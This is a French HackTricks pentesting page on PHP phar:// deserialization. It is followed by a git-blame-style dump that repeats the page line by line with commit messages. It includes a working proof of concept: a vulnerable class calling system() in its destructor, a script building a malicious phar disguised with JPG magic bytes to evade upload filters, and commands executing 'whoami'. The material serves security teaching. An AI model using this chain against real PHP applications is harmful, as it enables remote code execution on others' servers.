hacktricks/pentesting-web/file-inclusion/phar-deserialization.md

# phar:// désérialisation

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">

Si vous êtes intéressé par une **carrière de piratage** et que vous voulez pirater l'impossible - **nous recrutons !** (_maîtrise du polonais écrit et parlé requise_).

{% embed url="https://www.stmcyber.com/careers" %}

Les fichiers **Phar** (PHP Archive) contiennent des **métadonnées au format sérialisé**, donc, lorsqu'elles sont analysées, ces **métadonnées** sont **désérialisées** et vous pouvez essayer d'exploiter une vulnérabilité de **désérialisation** dans le code **PHP**.

La meilleure chose à propos de cette caractéristique est que cette désérialisation se produira même en utilisant des fonctions PHP qui n'évaluent pas le code PHP comme **file\_get\_contents(), fopen(), file() or file\_exists(), md5\_file(), filemtime() or filesize()**.

Imaginez donc une situation où vous pouvez faire en sorte qu'un site web PHP récupère la taille d'un fichier arbitraire en utilisant le protocole **`phar://`**, et à l'intérieur du code, vous trouvez une **classe** similaire à celle-ci :

{% code title="vunl.php" %}
```php
<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

filesize("phar://test.phar"); #The attacker can control this path
```
{% endcode %}

Vous pouvez créer un fichier **phar** qui, lorsqu'il est chargé, **exploite cette classe pour exécuter des commandes arbitraires** avec quelque chose comme :

{% code title="create_phar.php" %}
```php
<?php

class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();
```
{% endcode %}

Notez comment les **octets magiques de JPG** (`\xff\xd8\xff`) sont ajoutés au début du fichier phar pour **contourner** les **restrictions** **possibles** de **téléchargement** de fichiers.\
**Compilez** le fichier `test.phar` avec :
```bash
php --define phar.readonly=0 create_phar.php
```
Et exécutez la commande `whoami` en exploitant le code vulnérable avec :
```bash
php vuln.php
```
### Références

{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}

<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">

Si vous êtes intéressé par une **carrière de hacking** et souhaitez pirater l'impossible - **nous recrutons !** (_maîtrise du polonais à l'écrit et à l'oral requise_).

{% embed url="https://www.stmcyber.com/careers" %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? Ou souhaitez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de hacking en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:14:14 +00:00			`# phar:// désérialisation`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

update twitter 2023-04-25 20:35:28 +02:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:14:14 +00:00			`* Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi 2023-08-31 16:05:15 +00:00			`* Découvrez [La famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFT](https://opensea.io/collection/the-peass-family)`
Translated to French 2023-06-03 13:10:46 +00:00			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:14:14 +00:00			`* Rejoignez le [💬](https://emojipedia.org/speech-balloon/) [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez moi sur Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi 2023-08-31 16:05:15 +00:00			`<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">`
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi 2023-08-31 16:05:15 +00:00			`Si vous êtes intéressé par une carrière de piratage et que vous voulez pirater l'impossible - nous recrutons ! (_maîtrise du polonais écrit et parlé requise_).`
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00
			`{% embed url="https://www.stmcyber.com/careers" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Les fichiers Phar (PHP Archive) contiennent des métadonnées au format sérialisé, donc, lorsqu'elles sont analysées, ces métadonnées sont désérialisées et vous pouvez essayer d'exploiter une vulnérabilité de désérialisation dans le code PHP.`
GitBook: [master] 3 pages modified 2021-03-19 23:08:07 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi 2023-08-31 16:05:15 +00:00			`La meilleure chose à propos de cette caractéristique est que cette désérialisation se produira même en utilisant des fonctions PHP qui n'évaluent pas le code PHP comme file\_get\_contents(), fopen(), file() or file\_exists(), md5\_file(), filemtime() or filesize().`
GitBook: [master] 3 pages modified 2021-03-19 23:08:07 +00:00
Translated ['README.md', 'forensics/basic-forensic-methodology/specific- 2023-08-30 09:59:58 +00:00			Imaginez donc une situation où vous pouvez faire en sorte qu'un site web PHP récupère la taille d'un fichier arbitraire en utilisant le protocole `phar://`, et à l'intérieur du code, vous trouvez une classe similaire à celle-ci :
GitBook: [master] 3 pages modified 2021-03-19 23:08:07 +00:00
			`{% code title="vunl.php" %}`
			```php
			`<?php`
			`class AnyClass {`
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:14:14 +00:00			`public $data = null;`
			`public function __construct($data) {`
			`$this->data = $data;`
			`}`

			`function __destruct() {`
			`system($this->data);`
			`}`
GitBook: [master] 3 pages modified 2021-03-19 23:08:07 +00:00			`}`

			`filesize("phar://test.phar"); #The attacker can control this path`
			```
			`{% endcode %}`

Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:14:14 +00:00			`Vous pouvez créer un fichier phar qui, lorsqu'il est chargé, exploite cette classe pour exécuter des commandes arbitraires avec quelque chose comme :`
GitBook: [master] 3 pages modified 2021-03-19 23:08:07 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% code title="create_phar.php" %}`
GitBook: [master] 3 pages modified 2021-03-19 23:08:07 +00:00			```php
			`<?php`

			`class AnyClass {`
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:14:14 +00:00			`public $data = null;`
			`public function __construct($data) {`
			`$this->data = $data;`
			`}`

			`function __destruct() {`
			`system($this->data);`
			`}`
GitBook: [master] 3 pages modified 2021-03-19 23:08:07 +00:00			`}`

			`// create new Phar`
			`$phar = new Phar('test.phar');`
			`$phar->startBuffering();`
			`$phar->addFromString('test.txt', 'text');`
			`$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");`

			`// add object of any class as meta data`
			`$object = new AnyClass('whoami');`
			`$phar->setMetadata($object);`
			`$phar->stopBuffering();`
			```
			`{% endcode %}`

Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi 2023-08-31 16:05:15 +00:00			Notez comment les octets magiques de JPG (`\xff\xd8\xff`) sont ajoutés au début du fichier phar pour contourner les restrictions possibles de téléchargement de fichiers.\
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:14:14 +00:00			Compilez le fichier `test.phar` avec :
GitBook: [master] 3 pages modified 2021-03-19 23:08:07 +00:00			```bash
			`php --define phar.readonly=0 create_phar.php`
			```
Translated ['README.md', 'forensics/basic-forensic-methodology/specific- 2023-08-30 09:59:58 +00:00			Et exécutez la commande `whoami` en exploitant le code vulnérable avec :
GitBook: [master] 3 pages modified 2021-03-19 23:08:07 +00:00			```bash
			`php vuln.php`
			```
Translated to French 2023-06-03 13:10:46 +00:00			`### Références`
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00
			`{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}`
GitBook: [master] 3 pages modified 2021-03-19 23:08:07 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi 2023-08-31 16:05:15 +00:00			`<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi 2023-08-31 16:05:15 +00:00			`Si vous êtes intéressé par une carrière de hacking et souhaitez pirater l'impossible - nous recrutons ! (_maîtrise du polonais à l'écrit et à l'oral requise_).`
GitBook: [#3220] No subject 2022-05-24 00:07:19 +00:00
			`{% embed url="https://www.stmcyber.com/careers" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

update twitter 2023-04-25 20:35:28 +02:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:14:14 +00:00			`* Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? Ou souhaitez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
			`* Découvrez [La famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFT](https://opensea.io/collection/the-peass-family)`
Translated to French 2023-06-03 13:10:46 +00:00			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology 2023-08-16 05:14:14 +00:00			`* Rejoignez le [💬](https://emojipedia.org/speech-balloon/) [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez moi sur Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Partagez vos astuces de hacking en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`